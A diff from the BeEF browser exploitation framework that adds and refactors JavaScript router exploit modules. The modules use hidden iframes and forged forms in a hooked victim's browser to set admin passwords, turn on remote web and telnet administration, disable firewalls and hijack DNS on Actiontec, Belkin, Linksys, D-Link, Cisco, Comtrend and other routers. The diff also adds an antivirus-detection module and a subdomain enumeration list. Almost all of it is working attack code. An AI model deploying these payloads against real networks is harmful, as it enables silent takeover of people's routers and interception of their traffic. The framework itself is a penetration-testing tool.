+		{'type':'hidden', 'name':'remTelPassChanged',   'value':'1'}
+	]);
+
+	var actiontec_q1000_iframe3_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "advancedsetup_firewallsettings.cgi", "POST", [
+		{'type':'hidden', 'name':'fwLevel',             'value':'Basic'},
+		{'type':'hidden', 'name':'fwStealthMode',       'value':'0'}
+	]);
+
+	var actiontec_q1000_iframe4_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "ipv6_firewallsettings.cgi", "POST", [
+		{'type':'hidden', 'name':'ipv6_fwlevel',        'value':'basic'},
+		{'type':'hidden', 'name':'ipv6_fwenable',       'value':'0'}
+	]);
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+	cleanup = function() {
+		document.body.removeChild(actiontec_q1000_iframe1_<%= @command_id %>);
+		document.body.removeChild(actiontec_q1000_iframe2_<%= @command_id %>);
+		document.body.removeChild(actiontec_q1000_iframe3_<%= @command_id %>);
+		document.body.removeChild(actiontec_q1000_iframe4_<%= @command_id %>);
+	}
+	setTimeout("cleanup()", timeout*1000);
+
+});
+

modules/exploits/router/actiontec_q1000_csrf/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        actiontec_q1000_csrf:
+            enable: true
+            category: ["Exploits", "Router"]
+            name: "Actiontec Q1000 CSRF"
+            description: "Attempts to enable remote web and telnet administration, and disables the firewall on an Actiontec Q1000 router."
+            authors: ["james-otten"]
+            target:
+                working: ["ALL"]

modules/exploits/router/actiontec_q1000_csrf/module.rb

@@ -0,0 +1,21 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Actiontec_q1000_csrf < BeEF::Core::Command
+  
+	def self.options
+		return [
+			{'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.0.1/'},
+			{'name' => 'user', 'ui_label' => 'Desired username', 'value' => 'admin'},
+			{'name' => 'password', 'ui_label' => 'Desired password', 'value' => 'BeEF'},
+			{'name' => 'port', 'ui_label' => 'Desired web ui port', 'value' => '443'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end

modules/exploits/router/asmax_ar804gu_cmd_exec/command.js

@@ -14,7 +14,7 @@ beef.execute(function() {
 	img.setAttribute("style","visibility:hidden");
 	img.setAttribute("width","0");
 	img.setAttribute("height","0");
-	img.id = 'asmax_ar804gu';
+	img.id = 'asmax_ar804gu_<%= @command_id %>';
 	img.src = gateway+path+cmd;
 	document.body.appendChild(img);
 

modules/exploits/router/belkin_dns_csrf/command.js

@@ -0,0 +1,70 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	// config
+	var gateway = '<%= @base %>'; 
+	var path    = '/cgi-bin/setup_dns.exe';
+	var dns     = '<%= @dns %>';
+	var timeout = 15;
+
+	// validate DNS server IP address
+	var parts = dns.split('.');
+	if (parts.length != 4) {
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid DNS server IP address was provided");
+		return;
+	}
+	for (var i=0; i<parts.length; i++) {
+		var part = parts[i];
+		if (isNaN(part) || part < 0 || part > 255) {
+			beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid DNS server IP address was provided");
+			return;
+		}
+	}
+	var dns_1 = parts[0];
+	var dns_2 = parts[1];
+	var dns_3 = parts[2];
+	var dns_4 = parts[3];
+
+	// attempt auth with default password (admin)
+	// incorrect login attempts do not log out an authenticated session
+	var img = new Image();
+	img.setAttribute("style", "visibility:hidden");
+	img.setAttribute("width", "0");
+	img.setAttribute("height","0");
+	img.id = 'belkin_auth_<%= @command_id %>';
+	img.src = gateway+"/cgi-bin/login.exe?pws=admin";
+	document.body.appendChild(img);
+
+	// change DNS
+	var belkin_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + path, "POST", [
+		{'type':'hidden', 'name':'dns1_1',   'value':dns_1},
+		{'type':'hidden', 'name':'dns1_2',   'value':dns_2},
+		{'type':'hidden', 'name':'dns1_3',   'value':dns_3},
+		{'type':'hidden', 'name':'dns1_4',   'value':dns_4},
+		{'type':'hidden', 'name':'dns2_1',   'value':dns_1},
+		{'type':'hidden', 'name':'dns2_2',   'value':dns_2},
+		{'type':'hidden', 'name':'dns2_3',   'value':dns_3},
+		{'type':'hidden', 'name':'dns2_4',   'value':dns_4},
+		{'type':'hidden', 'name':'dns2_1_t', 'value':dns_1},
+		{'type':'hidden', 'name':'dns2_2_t', 'value':dns_2},
+		{'type':'hidden', 'name':'dns2_3_t', 'value':dns_3},
+		{'type':'hidden', 'name':'dns2_4_t', 'value':dns_4},
+		{'type':'hidden', 'name':'auto_from_isp', 'value':'0'}
+	]);
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+	// clean up
+	cleanup = function() {
+		document.body.removeChild(belkin_iframe_<%= @command_id %>);
+		document.body.removeChild(belkin_auth_<%= @command_id %>);
+	}
+	setTimeout("cleanup()", timeout*1000);
+
+});
+

modules/exploits/router/belkin_dns_csrf/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        belkin_dns_csrf:
+            enable: true
+            category: ["Exploits", "Router"]
+            name: "Belkin DNS Hijack CSRF"
+            description: "Attempts to change the DNS setting on a Belkin router.<br/><br/>Multiple models are affected, including F5D7230 and F1PI242EG, however this module has not been tested."
+            authors: ["bcoles"]
+            target:
+                unknown: ["ALL"]

modules/exploits/router/belkin_dns_csrf/module.rb

@@ -0,0 +1,21 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+###
+# This module has not been tested
+###
+class Belkin_dns_csrf < BeEF::Core::Command
+  
+	def self.options
+		return [
+			{'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.1/'},
+			{'name' => 'dns', 'ui_label' => 'DNS Server', 'value' => '8.8.8.8'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end

modules/exploits/router/bt_home_hub_csrf/command.js

@@ -6,21 +6,21 @@
 
 beef.execute(function() {
   var gateway = '<%= @base %>'; 
-  var passwd = '<%= @password %>';
+  var passwd  = '<%= @password %>';
+  var timeout = 15;
 
-
-
-  var bt_home_hub_iframe = beef.dom.createIframeXsrfForm(gateway + "/cgi/b/ras//?ce=1&be=1&l0=5&l1=5", "POST",
-      [{'type':'hidden', 'name':'0', 'value':'31'} ,
-       {'type':'hidden', 'name':'1', 'value':''},
-       {'type':'hidden', 'name':'30', 'value':passwd}]);
+  var bt_home_hub_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "/cgi/b/ras//?ce=1&be=1&l0=5&l1=5", "POST", [
+    {'type':'hidden', 'name':'0',  'value':'31'} ,
+    {'type':'hidden', 'name':'1',  'value':''},
+    {'type':'hidden', 'name':'30', 'value':passwd}
+  ]);
 
   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
   cleanup = function() {
-    document.body.removeChild(bt_home_hub_iframe);
+    document.body.removeChild(bt_home_hub_iframe_<%= @command_id %>);
   }
-  setTimeout("cleanup()", 15000);
+  setTimeout("cleanup()", timeout*1000);
 
 });
 

modules/exploits/router/cisco_e2400_csrf/command.js

@@ -7,8 +7,9 @@
 beef.execute(function() {
   var gateway = '<%= @base %>'; 
   var passwd  = '<%= @password %>';
+  var timeout = 15;
 
-  var cisco_e2400_iframe1 = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST",
+  var cisco_e2400_iframe1_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST",
       [
        {'type':'hidden', 'name':'submit_button',     'value':'Management'},
        {'type':'hidden', 'name':'change_action',     'value':''},
@@ -37,7 +38,7 @@ beef.execute(function() {
        {'type':'hidden', 'name':'upnp_internet_dis', 'value':'0'},
       ]);
 
-  var cisco_e2400_iframe2 = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST",
+  var cisco_e2400_iframe2_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST",
       [
        {'type':'hidden', 'name':'submit_button',       'value':'Firewall'},
        {'type':'hidden', 'name':'change_action',       'value':''},
@@ -59,10 +60,10 @@ beef.execute(function() {
   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
   cleanup = function() {
-    document.body.removeChild(cisco_e2400_iframe1);
-    document.body.removeChild(cisco_e2400_iframe2);
+    document.body.removeChild(cisco_e2400_iframe1_<%= @command_id %>);
+    document.body.removeChild(cisco_e2400_iframe2_<%= @command_id %>);
   }
-  setTimeout("cleanup()", 15000);
+  setTimeout("cleanup()", timeout*1000);
 
 });
 

modules/exploits/router/comtrend_ct5367_csrf/command.js

@@ -6,12 +6,13 @@
 
 beef.execute(function() {
   var gateway = '<%= @base %>'; 
-  var passwd = '<%= @password %>';
+  var passwd  = '<%= @password %>';
+  var timeout = 15;
 
-  var ct5367_iframe1 = beef.dom.createInvisibleIframe();
-  ct5367_iframe1.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
+  var ct5367_iframe1_<%= @command_id %> = beef.dom.createInvisibleIframe();
+  ct5367_iframe1_<%= @command_id %>.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
 
-  var ct5367_iframe2 = beef.dom.createInvisibleIframe();
+  var ct5367_iframe2_<%= @command_id %> = beef.dom.createInvisibleIframe();
 
   var form = document.createElement('form');
   form.setAttribute('action', gateway + "password.cgi");
@@ -37,16 +38,16 @@ beef.execute(function() {
   input.setAttribute('value', passwd);
   form.appendChild(input);
 
-  ct5367_iframe2.contentWindow.document.body.appendChild(form);
+  ct5367_iframe2_<%= @command_id %>.contentWindow.document.body.appendChild(form);
   form.submit();
 
   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
   cleanup = function() {
-    document.body.removeChild(ct5367_iframe1);
-    document.body.removeChild(ct5367_iframe2);
+    document.body.removeChild(ct5367_iframe1_<%= @command_id %>);
+    document.body.removeChild(ct5367_iframe2_<%= @command_id %>);
   }
-  setTimeout("cleanup()", 15000);
+  setTimeout("cleanup()", timeout*1000);
 
 });
 

modules/exploits/router/comtrend_ct5624_csrf/command.js

@@ -6,21 +6,22 @@
 
 beef.execute(function() {
   var gateway = '<%= @base %>'; 
-  var passwd = '<%= @password %>';
+  var passwd  = '<%= @password %>';
+  var timeout = 15;
 
-  var ct5367_iframe1 = beef.dom.createInvisibleIframe();
-  ct5367_iframe1.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
+  var ct5367_iframe1_<%= @command_id %> = beef.dom.createInvisibleIframe();
+  ct5367_iframe1_<%= @command_id %>.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
 
-  var ct5367_iframe2 = beef.dom.createInvisibleIframe();
-  ct5367_iframe2.setAttribute('src', gateway+'/password.cgi?usrPassword='+passwd+'&sysPassword='+passwd+'&sptPassword='+passwd);
+  var ct5367_iframe2_<%= @command_id %> = beef.dom.createInvisibleIframe();
+  ct5367_iframe2_<%= @command_id %>.setAttribute('src', gateway+'/password.cgi?usrPassword='+passwd+'&sysPassword='+passwd+'&sptPassword='+passwd);
 
   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
   cleanup = function() {
-    document.body.removeChild(ct5367_iframe1);
-    document.body.removeChild(ct5367_iframe2);
+    document.body.removeChild(ct5367_iframe1_<%= @command_id %>);
+    document.body.removeChild(ct5367_iframe2_<%= @command_id %>);
   }
-  setTimeout("cleanup()", 15000);
+  setTimeout("cleanup()", timeout*1000);
 
 });
 

modules/exploits/router/dlink_dir_615_csrf/command.js

@@ -7,8 +7,9 @@
 beef.execute(function() {
   var gateway = '<%= @base %>'; 
   var passwd  = '<%= @password %>';
+  var timeout = 15;
 
-  var dir615_iframe = beef.dom.createIframeXsrfForm(gateway + "tools_admin.php", "POST",
+  var dir615_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "tools_admin.php", "POST",
       [{'type':'hidden', 'name':'ACTION_POST',     'value':'1'} ,
        {'type':'hidden', 'name':'apply',           'value':'Save Settings'},
        {'type':'hidden', 'name':'admin_name',      'value':'admin'},
@@ -23,9 +24,9 @@ beef.execute(function() {
   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
   cleanup = function() {
-    document.body.removeChild(dir615_iframe);
+    document.body.removeChild(dir615_iframe_<%= @command_id %>);
   }
-  setTimeout("cleanup()", 15000);
+  setTimeout("cleanup()", timeout*1000);
 
 });
 

modules/exploits/router/dlink_dsl500t_csrf/command.js

@@ -6,9 +6,10 @@
 
 beef.execute(function() {
   var gateway = '<%= @base %>'; 
-  var passwd = '<%= @password %>';
+  var passwd  = '<%= @password %>';
+  var timeout = 15;
 
-  var dsl500t_iframe = beef.dom.createIframeXsrfForm(gateway + "cgi-bin/webcm", "POST",
+  var dsl500t_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "cgi-bin/webcm", "POST",
       [{'type':'hidden', 'name':'getpage', 'value':'../html/tools/usrmgmt.htm'} ,
        {'type':'hidden', 'name':'security:settings/username', 'value':'admin'},
        {'type':'hidden', 'name':'security:settings/password', 'value':passwd},
@@ -19,9 +20,9 @@ beef.execute(function() {
   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
   cleanup = function() {
-    document.body.removeChild(dsl500t_iframe);
+    document.body.removeChild(dsl500t_iframe_<%= @command_id %>);
   }
-  setTimeout("cleanup()", 15000);
+  setTimeout("cleanup()", timeout*1000);
 
 });
 

modules/exploits/router/huawei_smartax_mt880/command.js

@@ -5,19 +5,20 @@
 //
 
 beef.execute(function() {
-  var gateway = '<%= @base %>'; 
+  var gateway  = '<%= @base %>'; 
   var username = '<%= @username %>';
-  var passwd = '<%= @password %>';
+  var passwd   = '<%= @password %>';
+  var timeout  = 15;
 
-  var huawei_smartax_mt880_iframe = beef.dom.createInvisibleIframe();
-  huawei_smartax_mt880_iframe.setAttribute('src', gateway+"Action?user_id="+username+"&priv=1&pass1="+passwd+"&pass2="+passwd+"&id=70");
+  var huawei_smartax_mt880_iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
+  huawei_smartax_mt880_iframe_<%= @command_id %>.setAttribute('src', gateway+"Action?user_id="+username+"&priv=1&pass1="+passwd+"&pass2="+passwd+"&id=70");
 
   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
   cleanup = function() {
-    document.body.removeChild(huawei_smartax_mt880_iframe);
+    document.body.removeChild(huawei_smartax_mt880_iframe_<%= @command_id %>);
   }
-  setTimeout("cleanup()", 15000);
+  setTimeout("cleanup()", timeout*1000);
 
 });
 

modules/exploits/router/linksys_befsr41_csrf/command.js

@@ -5,15 +5,17 @@
 //
 
 beef.execute(function() {
+  var timeout = 15;
+
+  var befsr41_iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
+  befsr41_iframe_<%= @command_id %>.setAttribute('src', '<%= @base %>Gozila.cgi?PasswdModify=1&sysPasswd=<%= @password %>&sysPasswdConfirm=<%= @password %>&Remote_Upgrade=1&Remote_Management=1&RemotePort=<%= @port %>&UPnP_Work=0');
 
-  var befsr41_iframe = beef.dom.createInvisibleIframe();
-  befsr41_iframe.setAttribute('src', '<%= @base %>Gozila.cgi?PasswdModify=1&sysPasswd=<%= @password %>&sysPasswdConfirm=<%= @password %>&Remote_Upgrade=1&Remote_Management=1&RemotePort=<%= @port %>&UPnP_Work=0');
   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
   cleanup = function() {
-    document.body.removeChild(befsr41_iframe);
+    document.body.removeChild(befsr41_iframe_<%= @command_id %>);
   }
-  setTimeout("cleanup()", 15000);
+  setTimeout("cleanup()", timeout*1000);
 
 });
 

modules/exploits/router/linksys_wrt54g2_csrf/command.js

@@ -5,11 +5,12 @@
 //
 
 beef.execute(function() {
-  var port = '<%= @port %>';
+  var port    = '<%= @port %>';
   var gateway = '<%= @base %>'; 
-  var passwd = '<%= @password %>';
+  var passwd  = '<%= @password %>';
+  var timeout = 15;
 
-  var wrt54g2_iframe = beef.dom.createIframeXsrfForm(gateway + "Manage.tri", "POST",
+  var wrt54g2_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "Manage.tri", "POST",
       [{'type':'hidden', 'name':'MANAGE_USE_HTTP', 'value':'0'} ,
        {'type':'hidden', 'name':'MANAGE_HTTP', 'value':'1'},
        {'type':'hidden', 'name':'MANAGE_HTTP_S', 'value':'0'},
@@ -27,9 +28,9 @@ beef.execute(function() {
   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
   cleanup = function() {
-    document.body.removeChild(wrt54g2_iframe);
+    document.body.removeChild(wrt54g2_iframe_<%= @command_id %>);
   }
-  setTimeout("cleanup()", 15000);
+  setTimeout("cleanup()", timeout*1000);
 
 });
 

modules/exploits/router/linksys_wrt54g_csrf/command.js

@@ -5,31 +5,33 @@
 //
 
 beef.execute(function() {
-  var port = '<%= @port %>';
+  var port    = '<%= @port %>';
   var gateway = '<%= @base %>'; 
-  var passwd = '<%= @password %>';
+  var passwd  = '<%= @password %>';
+  var timeout = 15;
 
-  var wrt54g_iframe = beef.dom.createIframeXsrfForm(gateway + "manage.tri", "POST",
-      [{'type':'hidden', 'name':'remote_mgt_https', 'value':'0'} ,
-          {'type':'hidden', 'name':'http_enable', 'value':'1'},
-          {'type':'hidden', 'name':'https_enable', 'value':'0'},
-          {'type':'hidden', 'name':'PasswdModify', 'value':'1'},
-          {'type':'hidden', 'name':'http_passwd', 'value':passwd},
+  var wrt54g_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "manage.tri", "POST",
+      [
+          {'type':'hidden', 'name':'remote_mgt_https',   'value':'0'} ,
+          {'type':'hidden', 'name':'http_enable',        'value':'1'},
+          {'type':'hidden', 'name':'https_enable',       'value':'0'},
+          {'type':'hidden', 'name':'PasswdModify',       'value':'1'},
+          {'type':'hidden', 'name':'http_passwd',        'value':passwd},
           {'type':'hidden', 'name':'http_passwdConfirm', 'value':passwd},
-          {'type':'hidden', 'name':'_http_enable', 'value':'1'},
-          {'type':'hidden', 'name':'remote_management', 'value':'1'},
-          {'type':'hidden', 'name':'web_wl_filter', 'value':'1'},
-          {'type':'hidden', 'name':'http_wanport', 'value':port},
-          {'type':'hidden', 'name':'upnp_enable', 'value':'1'},
-          {'type':'hidden', 'name':'layout', 'value':'en'}
+          {'type':'hidden', 'name':'_http_enable',       'value':'1'},
+          {'type':'hidden', 'name':'remote_management',  'value':'1'},
+          {'type':'hidden', 'name':'web_wl_filter',      'value':'1'},
+          {'type':'hidden', 'name':'http_wanport',       'value':port},
+          {'type':'hidden', 'name':'upnp_enable',        'value':'1'},
+          {'type':'hidden', 'name':'layout',             'value':'en'}
       ]);
 
   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
   cleanup = function() {
-    document.body.removeChild(wrt54g_iframe);
+    document.body.removeChild(wrt54g_iframe_<%= @command_id %>);
   }
-  setTimeout("cleanup()", 15000);
+  setTimeout("cleanup()", timeout*1000);
 
 });
 

modules/exploits/router/virgin_superhub_csrf/command.js

@@ -9,30 +9,31 @@ beef.execute(function() {
 	var gateway = '<%= @base %>'; 
 	var passwd  = '<%= @password %>';
 	var port    = '<%= @port %>';
+	var timeout = 15;
 
-	var virgin_superhub_iframe1 = beef.dom.createIframeXsrfForm(gateway + "goform/RgSecurity", "POST", [
-		{'type':'hidden', 'name':'NetgearPassword', 'value':passwd},
+	var virgin_superhub_iframe1_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "goform/RgSecurity", "POST", [
+		{'type':'hidden', 'name':'NetgearPassword',        'value':passwd},
 		{'type':'hidden', 'name':'NetgearPasswordReEnter', 'value':passwd},
-		{'type':'hidden', 'name':'RestoreFactoryNo', 'value':'0x00'}
+		{'type':'hidden', 'name':'RestoreFactoryNo',       'value':'0x00'}
 	]);
 
-	var virgin_superhub_iframe2 = beef.dom.createIframeXsrfForm(gateway + "goform/RgServices", "POST", [
-		{'type':'hidden', 'name':'cbPortScanDetection', 'value':''}
+	var virgin_superhub_iframe2_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "goform/RgServices", "POST", [
+		{'type':'hidden', 'name':'cbPortScanDetection',    'value':''}
 	]);
 
-	var virgin_superhub_iframe3 = beef.dom.createIframeXsrfForm(gateway + "goform/RgVMRemoteManagementRes", "POST", [
-		{'type':'hidden', 'name':'NetgearVMRmEnable', 'value':'0x01'},
-		{'type':'hidden', 'name':'NetgearVMRmPortNumber', 'value':port}
+	var virgin_superhub_iframe3_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "goform/RgVMRemoteManagementRes", "POST", [
+		{'type':'hidden', 'name':'NetgearVMRmEnable',      'value':'0x01'},
+		{'type':'hidden', 'name':'NetgearVMRmPortNumber',  'value':port}
 	]);
 
 	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
 	cleanup = function() {
-		document.body.removeChild(virgin_superhub_iframe1);
-		document.body.removeChild(virgin_superhub_iframe2);
-		document.body.removeChild(virgin_superhub_iframe3);
+		document.body.removeChild(virgin_superhub_iframe1_<%= @command_id %>);
+		document.body.removeChild(virgin_superhub_iframe2_<%= @command_id %>);
+		document.body.removeChild(virgin_superhub_iframe3_<%= @command_id %>);
 	}
-	setTimeout("cleanup()", 15000);
+	setTimeout("cleanup()", timeout*1000);
 
 });
 

modules/exploits/zenoss_daemon_csrf/command.js

@@ -1,23 +0,0 @@
-//
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
-// See the file 'doc/COPYING' for copying permission
-//
-
-beef.execute(function() {
-  var base = '<%= @base %>'; 
-  var service = '<%= @service %>';
-  var action = '<%= @action %>';
-
-  var zenoss_daemon_iframe = beef.dom.createInvisibleIframe();
-  zenoss_daemon_iframe.setAttribute('src', base+'/zport/About?action='+action+'&daemon='+service+'&manage_daemonAction%3Amethod='+action);
-
-  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
-
-  cleanup = function() {
-    document.body.removeChild(zenoss_daemon_iframe);
-  }
-  setTimeout("cleanup()", 15000);
-
-});
-

modules/exploits/zenoss_daemon_csrf/module.rb

@@ -1,60 +0,0 @@
-#
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
-# See the file 'doc/COPYING' for copying permission
-#
-class Zenoss_daemon_csrf < BeEF::Core::Command
-  
-	def self.options
-		return [
-			{ 'name' => 'base', 'ui_label' => 'Zenoss web root', 'value' => 'http://192.168.1.1:8080/'}, 
-			{ 'name' => 'service',
-				'type' => 'combobox',
-				'ui_label' => 'Daemon',
-				'store_type' => 'arraystore',
-				'store_fields' => ['service', 'description'],
-				'store_data' => [
-					['zeoctl', 'zeoctl (Zope Enterprise Objects server - shares database between Zope instances)'],
-					['zopectl', 'zopectl (The Zope open source web application server)'],
-					['zenhub', 'zenhub (Broker between the data layer and the collection daemons)'],
-					['zenjobs', 'zenjobs (Zenjobs)'],
-					['zenping', 'zenping (ICMP ping status monitoring)'],
-					['zensyslog', 'zensyslog (Collection of and classification of syslog events)'],
-					['zenstatus', 'zenstatus (Active TCP connection testing of remote daemons)'],
-					['zenactions', 'zenactions (Alerts - SMTP, SNPP and Maintenance Windows)'],
-					['zentrap', 'zentrap (Receives SNMP traps and turns them into events)'],
-					['zenmodeler', 'zenmodeler (Configuration collection and configuration)'],
-					['zenperfsnmp', 'zenperfsnmp (High performance asynchronous SNMP performance collection)'],
-					['zencommand', 'zencommand (Runs plug-ins on the local box or on remote boxes through SSH)'],
-					['zenprocess', 'zenprocess (Process monitoring using SNMP host resources MIB)'],
-					['zenwin', 'zenwin (Windows Service Monitoring (WMI))'],
-					['zeneventlog', 'zeneventlog (Collect (WMI) event log events (aka NT Eventlog))'],
-					['zenjmx', 'zenjmx (ZenJMX)']
-				],
-				'emptyText' => 'Select a daemon',
-				'valueField' => 'service',
-				'displayField' => 'service', #'description',
-				'mode' => 'local',
-				'autoWidth' => true
-			},
-			{ 'name' => 'action',
-				'type' => 'combobox',
-				'ui_label' => 'Action',
-				'store_type' => 'arraystore',
-				'store_fields' => ['action'],
-				'store_data' => [
-					['Start'],['Stop'],['Restart']
-				],
-				'valueField' => 'action',
-				'displayField' => 'action',
-				'mode' => 'local',
-				'autoWidth' => true
-			}
-		]
-	end
-
-	def post_execute
-		save({'result' => @datastore['result']})
-	end
-
-end

modules/host/detect_bitdefender2012/command.js

@@ -0,0 +1,17 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+    var temp=document.body.innerHTML;
+    var key="netdefender/hui/ndhui.js";
+    if(temp.indexOf(key)>0) {
+        beef.net.send('<%= @command_url %>', <%= @command_id %>,'bitdefender=Installed');
+    } else {
+        beef.net.send('<%= @command_url %>', <%= @command_id %>,'bitdefender=Not Installed');
+    };
+
+});
+

modules/host/detect_bitdefender2012/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        detect_bitdefender2012:
+            enable: true
+            category: "Host"
+            name: "Detect Bit Defender 2012"
+            description: "This module detect the javascript code automatically included by Bitdefender 2012"
+            authors: ["nbblrr"]
+            target:
+                working: ["ALL"]

modules/host/detect_bitdefender2012/module.rb

@@ -0,0 +1,13 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+
+class Detect_bitdefender2012 < BeEF::Core::Command
+
+  def post_execute
+    save({'BitDefender' => @datastore['bitdefender']})
+  end
+
+end

modules/network/detect_soc_nets/command.js

@@ -17,7 +17,7 @@ beef.execute(function() {
 	img.setAttribute("style","visibility:hidden");
 	img.setAttribute("width","0");
 	img.setAttribute("height","0");
-	img.src = 'https://mail.google.com/mail/photos/static/AD34hIiQyJTs5FhsJ1mhFdK9wx4OZU2AgLNZLBbk2zMHYPUfs-ZzXPLq2s2vdBmgnJ6SoUCeBbFnjRlPUDXw860gsEDSKPrhBJYDgDBCd7g36x2tuBQc0TM?'+ new Date();
+	img.src = 'https://mail.google.com/mail/photos/img/photos/public/AIbEiAIAAABDCKa_hYq24u2WUyILdmNhcmRfcGhvdG8qKDI1ODFkOGViM2I5ZjUwZmZlYjE3MzQ2YmQyMjAzMjFlZTU3NjEzOTYwAZwSCm_MMUDjh599IgoA2muEmEZD?'+ new Date();
 	img.id = 'gmailimg';
 	img.setAttribute("attr","start");
 	img.onerror = function() {

modules/network/dns_enumeration/command.js

@@ -9,26 +9,26 @@ beef.execute(function() {
     var dns_list = "<%= @dns_list %>";
     var timeout = parseInt("<%= @timeout %>");
 
-    var cont=0; 
+    var cont=0;
     var port = 900;
     var protocol="http://";
     var hostnames;
 
     if(dns_list!="%default%") {
-        hostnames = dns_list.split(","); 
+        hostnames = dns_list.split(",");
     } else {
         hostnames = new Array("abc", "about", "accounts", "admin", "administrador", "administrator", "ads", "adserver", "adsl", "agent", "blog", "channel", "client", "dev", "dev1", "dev2", "dev3", "dev4", "dev5", "dmz", "dns", "dns0", "dns1", "dns2", "dns3", "extern", "extranet", "file", "forum", "forums", "ftp", "ftpserver", "host", "http", "https", "ida", "ids", "imail", "imap", "imap3", "imap4", "install", "intern", "internal", "intranet", "irc", "linux", "log", "mail", "map", "member", "members", "name", "nc", "ns", "ntp", "ntserver", "office", "owa", "phone", "pop", "ppp1", "ppp10", "ppp11", "ppp12", "ppp13", "ppp14", "ppp15", "ppp16", "ppp17", "ppp18", "ppp19", "ppp2", "ppp20", "ppp21", "ppp3", "ppp4", "ppp5", "ppp6", "ppp7", "ppp8", "ppp9", "pptp", "print", "printer", "project", "pub", "public", "preprod", "root", "route", "router", "server", "smtp", "sql", "sqlserver", "ssh", "telnet", "time", "voip", "w", "webaccess", "webadmin", "webmail", "webserver", "website", "win", "windows", "ww", "www", "wwww", "xml");
     }
-    
+
     function notify() {
